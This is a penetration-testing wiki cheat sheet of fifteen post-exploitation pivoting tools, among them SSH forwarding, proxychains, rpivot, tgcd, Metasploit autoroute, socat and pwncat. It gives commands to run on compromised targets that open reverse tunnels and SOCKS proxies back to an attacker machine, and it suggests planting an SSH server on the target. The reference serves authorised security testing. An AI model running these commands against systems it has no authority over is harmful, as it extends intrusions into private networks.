15 tools for Pivoting (Post-exploitation)

Penetration Testing Wiki

#1: Pivoting with rinetd

rinetd -f -c rinetd.conf
cat rinetd.conf

# bindaddress bindport connectaddress connectport
$PUBLICIP        80          $IP          80

ssh for windows: plink.exe

plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N

#3: Pivoting with SSH / OpenSSH

ssh local port forwarding (“proxy”, on the attacker machine)

Local port → Remote server

ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
ssh -L <localhost port>:<remote IP>:<remote port> $IP

Remote redirection (ssh remote port forwarding (“reverse shell”, on a compromised machine))

ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP 
ssh -R <server side port>:<localhost>:<local port> $IP

with ssh -L / -R local mapped ports are always mapped to 127.0.0.1 to map them to eth0/tun0 ifaces, use tgcd or socat!

Open question: How to forward local apache in attacker machine to private LAN network through pivoting

Dynamic port forwarding (socks4/5 proxy)

ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>

#4: Pivoting with VPN over SSH

/etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes
ssh [email protected] -w any:any

Routing not automatic, add routes and gateway. Also on server, ip forwarding

#5: Pivoting with proxychains

From compromised machine (hax0r user)

ssh -f -N -R 2222:127.0.0.1:22 [email protected]
ssh -f -N -D 127.0.0.1:8080 -p 2222 [email protected]

Edit /etc/proxychains.conf

[ProxyList]
socks4   127.0.0.1   8080

proxychains only allows TCP connect traffic!!!! And incredibly slow!

proxychains nmap --top-ports=20 -sT -Pn $IP/24

For proxying DNS change /usr/lib/proxychains3/proxyresolv.

#6: Pivoting with FreeSSHd.exe

Good to install on target for pivoting!!

Download from here: http://www.freesshd.com/freeSSHd.exe

#7: Pivoting with tinyproxy

https://github.com/tinyproxy/tinyproxy

#8: Pivoting with rpivot

  • Reverse socks proxy / Opposite to ssh -D / Supports windows credentials to use with a corporate proxy
  • Server should be started on pentester’s machine and listen to incoming connections from the client.
  • Python but no dependencies

Pentester machine (listener):

python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP

Target machine (if egress traffic not firewalled)

python client.py --server-ip $IP --server-port 9900

#9: Pivoting with 3proxy

On target:
(Can bypass target sshd tcp forwarding restrictions)

For SOCKS proxy:

cat 3proxy.config
socks -p1080 # socks proxy

For port redirection:

cat 3proxy.config
tcppm <localport> <targethost> <targetport>

Run:

./3proxy 3proxy.config &

#10: Pivoting with tgcd

tgcd is a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls. This can also be used by network analysts and security experts for penetration testing and analyze the security of their network.

This program has 3 different modes:

  • CC (ConnectConnect)
  • LL (ListenListen)
  • PF (PortForwarder)

CC and LL nodes are used together to provide access to a service inside a Local Area Network to the external network. PF node is, however, only a simple port forwarder.

On attacker (Do not support VPN):

tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10

On target:

tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10

#11: Pivoting with Metasploit

Method 1: Using Socks

msf> use auxiliary/server/socks4a
msf> run -j

Method 2: Using autoroute

meterpreter> run autoroute -s $IP/24
meterpreter > run autoroute -p

Method 3: Manual route

msf exploit(handler) > route add $IP 255.255.255.0 1

#12: Pivoting with ssf

On the target:

ssfd -p 11111

On the attacker machine:

ssf -D 22222 -p 11111 $TARGET_IP

#13: Pivoting with socat

  • Socat TCP GENDER CHANGER

On inside LAN server:

socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80

On outside LAN client:

socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10

Connect with outside client:

mozilla http://127.0.0.1/
  • Socat SSH encapsulation into SSL

On server:

socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'

on client:

ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080" $SERVER
  • Socat SSH deception (Bounds back to the client ssh server)
socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"

Source: https://twitter.com/climagic/status/1079026659435704320

See also more Socat commands in Direct and reverse shells

References:

#14: sshuttle

Sshutle is where transparent proxy meets VPN meets ssh. It can be download from https://github.com/sshuttle/sshuttle

You must have root access on the local machine, but you can have a normal account on the server.

sshuttle -r [email protected] 192.168.30.0/24

Where 192.168.10.5 is a machine inside our current network where there is a ssh server that we log in with the user pivotmachine, and 192.168.30.0/24 is the network we are redirecting from the ssh server machine to ours.

More info for sshuttle: https://sshuttle.readthedocs.io/en/stable/manpage.html

#15: pwncat

pwncat is a netcat on steroids mainly used for reverse and bind shells.

Nonetheless, it can be also used for pivoting in a syntax similar to ssh:

Local port forward (forward remote port 3306 to local port 5050):

pwncat -L 0.0.0.0:5050 example.org 3306

Connect to a remote MySQL server (remote port 3306) and then connect to another pwncat/netcat server on 10.0.0.1:4444 and bridge traffic:

pwncat -R 10.0.0.1:4444 example.org 3306

Reference: https://github.com/cytopia/pwncat